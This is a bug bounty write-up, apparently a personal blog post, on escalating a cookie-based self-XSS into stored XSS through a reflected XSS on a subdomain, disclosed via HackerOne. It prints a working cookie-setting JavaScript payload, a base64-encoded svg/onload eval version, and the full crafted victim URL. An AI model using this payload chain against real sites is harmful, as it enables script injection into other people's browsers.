ABOUT ME

    -

    Today
    -
    Yesterday
    -
    Total
    -
    • From Unexploited XSS To Self Stored XSS on victim Cookies
      BugBounty 2021. 3. 22. 06:01

      Day #1

      This is part 2 of this story  , i will talk about a self XSS on Cookies And how i did the exploit through an out of scope subdomain.So our target is redact.com. first how i got the vulnerable attribute on cookies based? After browsing the redact.com i stopped in this path www.redacted.com/redactedfolder/redactedpage/ID and i used param miner {bruteForce] for hidden parameters , i got TWO but Unfortunately all are Filtered, then turned to guess Cookie parameters

       

       

       

      finally i got an attribute named visitor_id and was injected on the js source code

       

      Now i have A self XSS and it's out of scope. but subdomains allows you to set cookie so i will exploit through an out-of scope subdomain.

      Day#2

      i extracted subdomains, after 1h/2h i got an reflected xss on a sub named http://dev-labs.redact.com/login?username=[Here], So we will set cookie from subdomain to the main domain, [ Hope you understand the exploitation if \ not , please watch the video

      https://www.youtube.com/watch?v=ntWOiuKe5ts&feature=youtu.be&ab_channel=DawidCzagan]

       

      So our exploit:

       

      document.cookie='visitor_id=w0; domain=.redact.com; path=/;' ;document.location=" https://www.redact.com/redactfolder/redactpage/1337 "

       

      let's Encode it:

       

      </Script><svg/onload=eval(atob('ZG9jdW1lbnQuY29va2llPSd2aXNpdG9yX2lkPXcwPC9zY3JpcHQ+PHN2Zy9vbmxv
YWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT47IGRvbWFpbj0ucmVkYWN0LmNvbTsgcGF0aD0vOycgO2RvY3VtZW50Lmxv
Y2F0aW9uPSJodHRwczovL3d3dy5yZWRhY3QuY29tL3JlZGFjdGZvbGRlci9yZWRhY3RwYWdlLzEzMzci'))>

       

      So Now we have A valid Poc will all sent the url to victime:

       

      http://dev-labs.redact.com/login?username=</script><svg/onload=eval(atob('+ZG9jdW1lbnQuY29va2llPSd
2aXNpdG9yX2lkPXcwPC9zY3JpcHQPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT47IGRvbWFpbj0ucmVkYWN0L
mNvbTsgcGF0aD0vOycgO2RvY3VtZW50LmxvY2F0aW9uPSJodHRwczovL3d3dy5yZWRhY3QuY29tL3JlZGFjdGZvbGRlci9y
ZWRhY3RwYWdlLzEzMzci'))>

       

      will automatically redirect us with the visitor_id attribute and payload to main domain because we have add it via document.location. it's work :D

      Timeline

      Jan 02 - Reported Via Hackerone

      Jan 04 - Hackerone Staff updated the severity from High to Medium(6.1)

      Jan 07- Report Triaged And Bounty paid by Program staff

       

      That's all, thankyou very much for reading it till the last. Hope you would have enjoyed it.

       

       

      Thanks to @elmrhaseel @ayoubakup @Moroccan-Bugbounty-Hunters

      'BugBounty' 카테고리의 다른 글

      I found an SQL injection using Github dorking and here's my short story.  (0) 2022.04.28
      Cors Misconfiguration : Steal victim token and PII leads to ATO  (0) 2021.03.22

      TAG

      관련글 관련글 더보기

    Designed by Tistory.

    티스토리툴바